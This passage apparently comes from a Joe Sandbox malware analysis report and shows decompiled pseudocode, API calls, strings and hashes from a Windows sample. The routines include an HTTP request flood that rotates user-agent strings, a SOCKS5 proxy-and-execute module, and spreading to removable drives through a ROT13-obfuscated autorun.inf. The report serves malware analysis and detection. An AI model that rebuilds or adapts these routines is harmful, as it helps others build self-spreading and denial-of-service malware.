                                                                          							 *_t137 =  *0x10008258 + 0x40;
                                                                          							fprintf(??, ??);
                                                                          							 *_t137 =  *0x10008258 + 0x40;
                                                                          							fflush(_t131);
                                                                          							abort();
                                                                          							0;
                                                                          							goto ( *0x10008244);
                                                                          						}
                                                                          						asm("cld");
                                                                          						memset(_t72, _v196, 0xf << 2);
                                                                          						_t138 = _t135 + 0xc;
                                                                          						 *((intOrPtr*)(_t108 + 4)) = L100034E8;
                                                                          						_t114 = 1;
                                                                          						 *((intOrPtr*)(_t108 + 8)) = E10003140;
                                                                          						 *_t108 = 0x3c;
                                                                          						 *((intOrPtr*)(_t108 + 0x28)) = 0;
                                                                          						 *((intOrPtr*)(_t108 + 0x14)) =  *0x10006034;
                                                                          						 *((intOrPtr*)(_t108 + 0x18)) =  *0x10006038;
                                                                          						 *((intOrPtr*)(_t108 + 0x1c)) =  *0x10004064;
                                                                          						 *((intOrPtr*)(_t108 + 0x20)) =  *0x10004068;
                                                                          						 *((intOrPtr*)(_t108 + 0x30)) = 0xffffffff;
                                                                          						 *((intOrPtr*)(_t108 + 0x2c)) =  *0x10006044;
                                                                          						 *((intOrPtr*)(_t108 + 0x38)) =  *0x10004070;
                                                                          						_t118 = 0x1f;
                                                                          						 *((intOrPtr*)(_t108 + 0x34)) =  *0x1000406c;
                                                                          						do {
                                                                          							_t90 = _t108 & _t114;
                                                                          							asm("sbb eax, eax");
                                                                          							_t114 = _t114 + _t114;
                                                                          							 *((char*)(_t118 +  &_v192)) = (_t90 & 0x00000020) + 0x41;
                                                                          							_t118 = _t118 - 1;
                                                                          						} while (_t118 >= 0);
                                                                          						_t93 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          						_v160 = _t93;
                                                                          						_t94 = M10005250; // 0x57434347
                                                                          						_v156 = _t94;
                                                                          						_t95 = M10005254; // 0x452d3233
                                                                          						_v152 = _t95;
                                                                          						_t96 = M10005258; // 0x2d322d48
                                                                          						_v148 = _t96;
                                                                          						_t97 = M1000525C; // 0x4a4c4a53
                                                                          						_v144 = _t97;
                                                                          						_t98 = M10005260; // 0x4854472d
                                                                          						_v140 = _t98;
                                                                          						_t99 = M10005264; // 0x494d2d52
                                                                          						_v136 = _t99;
                                                                          						_t100 =  *0x10005268; // 0x3357474e
                                                                          						_v132 = _t100;
                                                                          						_v128 =  *0x1000526c & 0x0000ffff;
                                                                          						 *_t138 =  &_v192;
                                                                          						_t124 = AddAtomA(??) & 0x0000ffff;
                                                                          						_t139 = _t138 - 4;
                                                                          						if(_t124 != 0) {
                                                                          							_t105 = E10003150(_t124, _t108);
                                                                          							_t119 = _t124;
                                                                          							if(_t105 != _t108) {
                                                                          								goto L8;
                                                                          							} else {
                                                                          								goto L9;
                                                                          							}
                                                                          							goto L18;
                                                                          						} else {
                                                                          							L8:
                                                                          							_t119 = 0;
                                                                          						}
                                                                          						L9:
                                                                          						if(_t119 == 0) {
                                                                          							 *_t139 = _t108;
                                                                          							L10003498();
                                                                          							 *_t139 = _t127;
                                                                          							_t68 = FindAtomA(??) & 0x0000ffff;
                                                                          							goto L11;
                                                                          						}
                                                                          					}
                                                                          					 *0x10006114 = _t108;
                                                                          					_t46 = _t108 + 4; // 0x4
                                                                          					 *0x10006104 = _t46;
                                                                          					_t47 = _t108 + 8; // 0x8
                                                                          					_t71 = _t47;
                                                                          					 *0x10006124 = _t71;
                                                                          					return _t71;
                                                                          				} else {
                                                                          					return __eax;
                                                                          				}
                                                                          				L18:
                                                                          			}












































































                                                                          0x10001173
                                                                          0x100031f1
                                                                          0x100031f5
                                                                          0x100031f6
                                                                          0x10003204
                                                                          0x1000320e
                                                                          0x10003215
                                                                          0x1000321a
                                                                          0x1000321d
                                                                          0x10003224
                                                                          0x1000322b
                                                                          0x1000322e
                                                                          0x10003233
                                                                          0x1000323a
                                                                          0x10003241
                                                                          0x10003244
                                                                          0x10003249
                                                                          0x10003250
                                                                          0x10003257
                                                                          0x1000325a
                                                                          0x1000325f
                                                                          0x10003266
                                                                          0x10003269
                                                                          0x1000326e
                                                                          0x10003271
                                                                          0x10003276
                                                                          0x10003279
                                                                          0x1000327e
                                                                          0x10003281
                                                                          0x10003286
                                                                          0x10003290
                                                                          0x10003294
                                                                          0x1000329d
                                                                          0x100032a0
                                                                          0x100032a5
                                                                          0x100032ab
                                                                          0x100033ec
                                                                          0x100033f1
                                                                          0x100032b1
                                                                          0x100032b1
                                                                          0x100032b8
                                                                          0x100032bf
                                                                          0x100032c1
                                                                          0x10003420
                                                                          0x1000342b
                                                                          0x1000342f
                                                                          0x10003433
                                                                          0x10003439
                                                                          0x10003440
                                                                          0x10003447
                                                                          0x1000344e
                                                                          0x1000345a
                                                                          0x1000345d
                                                                          0x1000346a
                                                                          0x1000346d
                                                                          0x10003472
                                                                          0x1000347d
                                                                          0x10003480
                                                                          0x10003480
                                                                          0x100032c7
                                                                          0x100032d5
                                                                          0x100032d5
                                                                          0x100032d7
                                                                          0x100032de
                                                                          0x100032e3
                                                                          0x100032ef
                                                                          0x100032fb
                                                                          0x10003302
                                                                          0x1000330a
                                                                          0x10003313
                                                                          0x1000331b
                                                                          0x1000331e
                                                                          0x10003325
                                                                          0x10003333
                                                                          0x10003336
                                                                          0x1000333b
                                                                          0x10003340
                                                                          0x10003342
                                                                          0x10003347
                                                                          0x1000334b
                                                                          0x1000334f
                                                                          0x10003356
                                                                          0x10003356
                                                                          0x10003359
                                                                          0x1000335e
                                                                          0x10003364
                                                                          0x10003369
                                                                          0x1000336f
                                                                          0x10003374
                                                                          0x1000337a
                                                                          0x1000337f
                                                                          0x10003385
                                                                          0x1000338a
                                                                          0x10003390
                                                                          0x10003395
                                                                          0x1000339b
                                                                          0x100033a0
                                                                          0x100033a3
                                                                          0x100033a8
                                                                          0x100033b2
                                                                          0x100033bc
                                                                          0x100033c5
                                                                          0x100033c8
                                                                          0x100033cd
                                                                          0x10003413
                                                                          0x1000341a
                                                                          0x1000341c
                                                                          0x00000000
                                                                          0x1000341e
                                                                          0x00000000
                                                                          0x1000341e
                                                                          0x00000000
                                                                          0x100033cf
                                                                          0x100033cf
                                                                          0x100033cf
                                                                          0x100033cf
                                                                          0x100033d1
                                                                          0x100033d3
                                                                          0x100033d5
                                                                          0x100033d8
                                                                          0x100033dd
                                                                          0x100033e9
                                                                          0x00000000
                                                                          0x100033e9
                                                                          0x100033d3
                                                                          0x100033f3
                                                                          0x100033f9
                                                                          0x100033fc
                                                                          0x10003401
                                                                          0x10003401
                                                                          0x10003404
                                                                          0x10003410
                                                                          0x10003206
                                                                          0x1000320d
                                                                          0x1000320d
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Atom$Findmalloc
                                                                          • String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
                                                                          • API String ID: 822928543-4229226183
                                                                          • Opcode ID: 1cde5f556251f28f7a5f3583a1219a429abfe4cc9823d3c67868c7c8279f6633
                                                                          • Instruction ID: 71f7b58b7c901956c89d88a69398e3d4065bf1f5cfcf73eda586495b1d2063c5
                                                                          • Opcode Fuzzy Hash: 1cde5f556251f28f7a5f3583a1219a429abfe4cc9823d3c67868c7c8279f6633
                                                                          • Instruction Fuzzy Hash: B36137B4A00324CFEB51CF68C9C469ABBF4FB49391F15816AE948EB319E731A944CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 27%
                                                                          			E00406A48(void* __eflags, intOrPtr* _a4) {
                                                                          				void* _v16;
                                                                          				char _v1052;
                                                                          				intOrPtr _v1068;
                                                                          				intOrPtr _v1072;
                                                                          				intOrPtr _v1076;
                                                                          				intOrPtr _v1080;
                                                                          				intOrPtr _v1084;
                                                                          				char* _v1100;
                                                                          				char* _v1104;
                                                                          				char* _v1108;
                                                                          				char* _v1112;
                                                                          				char* _v1116;
                                                                          				char* _v1120;
                                                                          				char* _v1124;
                                                                          				char* _v1128;
                                                                          				char* _v1132;
                                                                          				intOrPtr _v1144;
                                                                          				intOrPtr _v1148;
                                                                          				intOrPtr _v1152;
                                                                          				char _v1156;
                                                                          				char* _v1160;
                                                                          				void* __ebx;
                                                                          				signed int _t39;
                                                                          				char _t45;
                                                                          				intOrPtr* _t49;
                                                                          				char _t50;
                                                                          				intOrPtr _t51;
                                                                          				char _t63;
                                                                          				char _t64;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          				intOrPtr* _t67;
                                                                          				intOrPtr* _t69;
                                                                          				intOrPtr* _t70;
                                                                          
                                                                          				_t67 = _t66 - 0x47c;
                                                                          				_t49 = _a4;
                                                                          				_v1132 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
                                                                          				_v1128 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)";
                                                                          				_v1124 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)";
                                                                          				_v1120 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
                                                                          				_v1116 = "Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1";
                                                                          				_v1112 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)";
                                                                          				_v1108 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)";
                                                                          				_v1104 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
                                                                          				_v1100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
                                                                          				 *_t67 = 9;
                                                                          				_t39 = E00404EAE();
                                                                          				_t51 =  *_t49;
                                                                          				_v1084 = _t51;
                                                                          				_t63 =  *((intOrPtr*)(_t49 + 4));
                                                                          				_v1080 = _t63;
                                                                          				_v1076 =  *((intOrPtr*)(_t49 + 8));
                                                                          				_v1072 =  *((intOrPtr*)(_t49 + 0xc));
                                                                          				_v1068 =  *((intOrPtr*)(_t49 + 0x10));
                                                                          				_v1148 = _t51;
                                                                          				_v1152 =  *((intOrPtr*)(_t65 + _t39 * 4 - 0x468));
                                                                          				_v1156 = _t63;
                                                                          				_v1160 = "GET %s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\n";
                                                                          				_t50 =  &_v1052;
                                                                          				 *_t67 = _t50;
                                                                          				wsprintfA(??, ??);
                                                                          				asm("cld");
                                                                          				asm("repne scasb");
                                                                          				 *((short*)(0xffffffff + _t50)) = 0xa0d;
                                                                          				 *((char*)(0xbadbac + _t50 + 2)) = 0;
                                                                          				_t64 = _t50;
                                                                          				while(1) {
                                                                          					_t45 = E00405434(_v1084, _t50, _v1084, _v1076);
                                                                          					_t50 = _t45;
                                                                          					if(_t45 == 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					asm("cld");
                                                                          					asm("repne scasb");
                                                                          					_v1144 = 0;
                                                                          					_v1148 = 0xbadbac;
                                                                          					_v1152 = _t64;
                                                                          					_v1156 = _t50;
                                                                          					L004086B0();
                                                                          					_t69 = _t67 - 0x10;
                                                                          					 *_t69 = _t50;
                                                                          					L004086C0();
                                                                          					_t70 = _t69 - 4;
                                                                          					 *_t70 = _v1068;
                                                                          					Sleep(??);
                                                                          					_t67 = _t70 - 4;
                                                                          				}
                                                                          				return 0;
                                                                          			}





































                                                                          0x00406a4e
                                                                          0x00406a54
                                                                          0x00406a57
                                                                          0x00406a61
                                                                          0x00406a6b
                                                                          0x00406a75
                                                                          0x00406a7f
                                                                          0x00406a89
                                                                          0x00406a93
                                                                          0x00406a9d
                                                                          0x00406aa7
                                                                          0x00406ab1
                                                                          0x00406ab8
                                                                          0x00406abd
                                                                          0x00406abf
                                                                          0x00406ac5
                                                                          0x00406ac8
                                                                          0x00406ad1
                                                                          0x00406ada
                                                                          0x00406ae3
                                                                          0x00406ae9
                                                                          0x00406af4
                                                                          0x00406af8
                                                                          0x00406afc
                                                                          0x00406b04
                                                                          0x00406b0a
                                                                          0x00406b0d
                                                                          0x00406b14
                                                                          0x00406b1c
                                                                          0x00406b21
                                                                          0x00406b27
                                                                          0x00406b2c
                                                                          0x00406b2e
                                                                          0x00406b41
                                                                          0x00406b46
                                                                          0x00406b4b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b4f
                                                                          0x00406b57
                                                                          0x00406b5c
                                                                          0x00406b64
                                                                          0x00406b68
                                                                          0x00406b6c
                                                                          0x00406b6f
                                                                          0x00406b74
                                                                          0x00406b77
                                                                          0x00406b7a
                                                                          0x00406b7f
                                                                          0x00406b88
                                                                          0x00406b8b
                                                                          0x00406b90
                                                                          0x00406b90
                                                                          0x00406ba1

                                                                          APIs
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • wsprintfA.USER32 ref: 00406B0D
                                                                            • Part of subcall function 00405434: WSASocketA.WS2_32 ref: 0040546A
                                                                            • Part of subcall function 00405434: htons.WS2_32 ref: 00405485
                                                                            • Part of subcall function 00405434: WSAConnect.WS2_32 ref: 004054D7
                                                                          • send.WS2_32 ref: 00406B6F
                                                                          • closesocket.WS2_32 ref: 00406B7A
                                                                          • Sleep.KERNEL32 ref: 00406B8B
                                                                          Strings
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon), xrefs: 00406A61
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322), xrefs: 00406A75
                                                                          • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 00406AA7
                                                                          • GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*, xrefs: 00406AFC
                                                                          • Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729), xrefs: 00406A6B
                                                                          • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1), xrefs: 00406A89
                                                                          • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;), xrefs: 00406A93
                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 00406A57
                                                                          • Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0), xrefs: 00406A9D
                                                                          • Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1, xrefs: 00406A7F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectCountSleepSocketTickclosesockethtonsrandsendsrandwsprintf
                                                                          • String ID: GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*$Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)$Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1
                                                                          • API String ID: 336679807-801071570
                                                                          • Opcode ID: c83cad52eaf153bfa2597a7668835f7560a72396ad6db5fc3469acb45590c5f7
                                                                          • Instruction ID: 5cdc0710ae53c098c5dd65590a42bc470b49e3f5e350015ac0ed1cf0fb49e237
                                                                          • Opcode Fuzzy Hash: c83cad52eaf153bfa2597a7668835f7560a72396ad6db5fc3469acb45590c5f7
                                                                          • Instruction Fuzzy Hash: D83141F49047148BCB20DF29C58428DBBF0EF85314F1085AEE558AB392D7789A95CF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E100017DF(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char* _a8, void* _a12, intOrPtr _a16, void* _a20) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				void* _v24;
                                                                          				void* _v44;
                                                                          				void* _v45;
                                                                          				void* _v68;
                                                                          				void* _v72;
                                                                          				void* _v76;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          				char* _t97;
                                                                          				void* _t99;
                                                                          				intOrPtr _t103;
                                                                          				intOrPtr _t106;
                                                                          
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_v8 = __edi;
                                                                          				_t106 = _a4;
                                                                          				_t97 = _a8;
                                                                          				_t103 = _a16;
                                                                          				_t62 = E1000128D(_t61, _t106, _t97, 4);
                                                                          				_t99 = 0;
                                                                          				if(_t62 == 0 ||  *_t97 == 5 &&  *((char*)(_t97 + 2)) == 0) {
                                                                          					L31:
                                                                          					return _t99;
                                                                          				} else {
                                                                          					goto L31;
                                                                          				}
                                                                          			}


















                                                                          0x100017e5
                                                                          0x100017e8
                                                                          0x100017eb
                                                                          0x100017ee
                                                                          0x100017f1
                                                                          0x100017f4
                                                                          0x10001806
                                                                          0x1000180b
                                                                          0x10001812
                                                                          0x10001a4c
                                                                          0x10001a5a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • sread.SHERVANS ref: 10001806
                                                                          • socks5_exec.SHERVANS ref: 10001863
                                                                            • Part of subcall function 1000157E: GetTempPathA.KERNEL32 ref: 1000159B
                                                                            • Part of subcall function 1000157E: GetTempFileNameA.KERNEL32 ref: 100015C0
                                                                            • Part of subcall function 1000157E: CreateFileA.KERNEL32 ref: 100015FB
                                                                            • Part of subcall function 1000157E: closesocket.WS2_32 ref: 100017BA
                                                                            • Part of subcall function 1000157E: DeleteFileA.KERNEL32 ref: 100017CF
                                                                          • sread.SHERVANS ref: 100019B7
                                                                          • sread.SHERVANS ref: 100019D2
                                                                          • swrite.SHERVANS ref: 100019ED
                                                                          • swrite.SHERVANS ref: 10001A05
                                                                          • swrite.SHERVANS ref: 10001A20
                                                                          • sread.SHERVANS ref: 10001A45
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: sread$Fileswrite$Temp$CreateDeleteNamePathclosesocketsocks5_exec
                                                                          • String ID:
                                                                          • API String ID: 1579704005-0
                                                                          • Opcode ID: 1361eb1be249255d460c70edfd148e1c9b89b3f8427c69b145975216a9914cb7
                                                                          • Instruction ID: 5eecf2eb680c679f1e884437c8fbeb8378991082b1e0f8ebcdaa05e3154df527
                                                                          • Opcode Fuzzy Hash: 1361eb1be249255d460c70edfd148e1c9b89b3f8427c69b145975216a9914cb7
                                                                          • Instruction Fuzzy Hash: EC6119B4A0A7459BF741DF64C08039EBBE0EF89290F11881DE888D7359DB74DA85CB97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 43%
                                                                          			E004068A0() {
                                                                          				void* _v16;
                                                                          				char _v188;
                                                                          				char _v220;
                                                                          				char _v348;
                                                                          				char _v349;
                                                                          				char _v380;
                                                                          				void _v476;
                                                                          				intOrPtr _v484;
                                                                          				int _v488;
                                                                          				void* _v492;
                                                                          				int _t40;
                                                                          				CHAR* _t42;
                                                                          				void* _t47;
                                                                          				signed int _t49;
                                                                          				void* _t50;
                                                                          				void* _t51;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				void** _t55;
                                                                          				intOrPtr* _t56;
                                                                          
                                                                          				memcpy( &_v476, 0x40d460, 0x60);
                                                                          				E00404C38( &_v380, "nhgbeha.vas");
                                                                          				_v488 = "fngbeanf.qyy";
                                                                          				_t47 =  &_v220;
                                                                          				_v492 = _t47;
                                                                          				E00404C38();
                                                                          				_v484 = _t47;
                                                                          				_v488 = 0x96;
                                                                          				_v492 =  &_v188;
                                                                          				E00404620();
                                                                          				if(E00404ED6( &_v188) != 0) {
                                                                          					_t50 =  &_v348;
                                                                          					while(1) {
                                                                          						Sleep(0x1770);
                                                                          						_t54 = _t53 - 4;
                                                                          						_t49 = 0;
                                                                          						do {
                                                                          							_t40 = GetDriveTypeA( *(_t52 + _t49 * 4 - 0x1d8));
                                                                          							_t54 = _t54 - 4;
                                                                          							if(_t40 == 2) {
                                                                          								_t51 =  &_v348;
                                                                          								memset(_t51, 0, 0x78);
                                                                          								_t42 =  *(_t52 + _t49 * 4 - 0x1d8);
                                                                          								_v488 = _t42;
                                                                          								_v492 = _t51;
                                                                          								L0040C208();
                                                                          								_v492 = _t51;
                                                                          								L0040C310();
                                                                          								_t55 = _t54 - 4;
                                                                          								if(_t42[(char*)( &_v349)] != 0x5c) {
                                                                          									_v492 = 0x412935;
                                                                          									 *_t55 = _t51;
                                                                          									L0040C328();
                                                                          									_t55 = _t55 - 8;
                                                                          								}
                                                                          								_v492 =  &_v380;
                                                                          								 *_t55 = _t50;
                                                                          								L0040C208();
                                                                          								 *_t55 = 1;
                                                                          								SetErrorMode(??);
                                                                          								_t56 = _t55 - 4;
                                                                          								_v488 = 0;
                                                                          								_v492 = _t50;
                                                                          								 *_t56 =  &_v188;
                                                                          								CopyFileA(??, ??, ??);
                                                                          								_t54 = _t56 - 0xc;
                                                                          							}
                                                                          							_t49 = 1 + _t49;
                                                                          						} while (_t49 <= 0x17);
                                                                          					}
                                                                          				}
                                                                          				return 0;
                                                                          			}
























                                                                          0x004068c5
                                                                          0x004068db
                                                                          0x004068e0
                                                                          0x004068e8
                                                                          0x004068ee
                                                                          0x004068f1
                                                                          0x004068f6
                                                                          0x004068fa
                                                                          0x00406908
                                                                          0x0040690b
                                                                          0x0040691a
                                                                          0x00406920
                                                                          0x00406926
                                                                          0x0040692d
                                                                          0x00406932
                                                                          0x00406935
                                                                          0x0040693a
                                                                          0x00406944
                                                                          0x00406949
                                                                          0x0040694f
                                                                          0x00406955
                                                                          0x0040696e
                                                                          0x00406973
                                                                          0x0040697a
                                                                          0x0040697e
                                                                          0x00406981
                                                                          0x00406986
                                                                          0x00406989
                                                                          0x0040698e
                                                                          0x00406999
                                                                          0x0040699b
                                                                          0x004069a3
                                                                          0x004069a6
                                                                          0x004069ab
                                                                          0x004069ab
                                                                          0x004069b4
                                                                          0x004069b8
                                                                          0x004069bb
                                                                          0x004069c0
                                                                          0x004069c7
                                                                          0x004069cc
                                                                          0x004069cf
                                                                          0x004069d7
                                                                          0x004069e1
                                                                          0x004069e4
                                                                          0x004069e9
                                                                          0x004069e9
                                                                          0x004069ec
                                                                          0x004069ed
                                                                          0x004069f6
                                                                          0x00406926
                                                                          0x00406a07

                                                                          APIs
                                                                          • memcpy.MSVCRT ref: 004068C5
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
                                                                            • Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB
                                                                          • Sleep.KERNEL32 ref: 0040692D
                                                                          • GetDriveTypeA.KERNEL32 ref: 00406944
                                                                          • memset.MSVCRT ref: 0040696E
                                                                          • _mbscat.MSVCRT ref: 00406981
                                                                          • lstrlen.KERNEL32 ref: 00406989
                                                                          • lstrcat.KERNEL32 ref: 004069A6
                                                                          • _mbscat.MSVCRT ref: 004069BB
                                                                          • SetErrorMode.KERNEL32 ref: 004069C7
                                                                          • CopyFileA.KERNEL32 ref: 004069E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$_mbscatlstrlenmemset$CopyDirectoryDriveErrorFileModeSleepSystemTypefclosefopenmemcpy
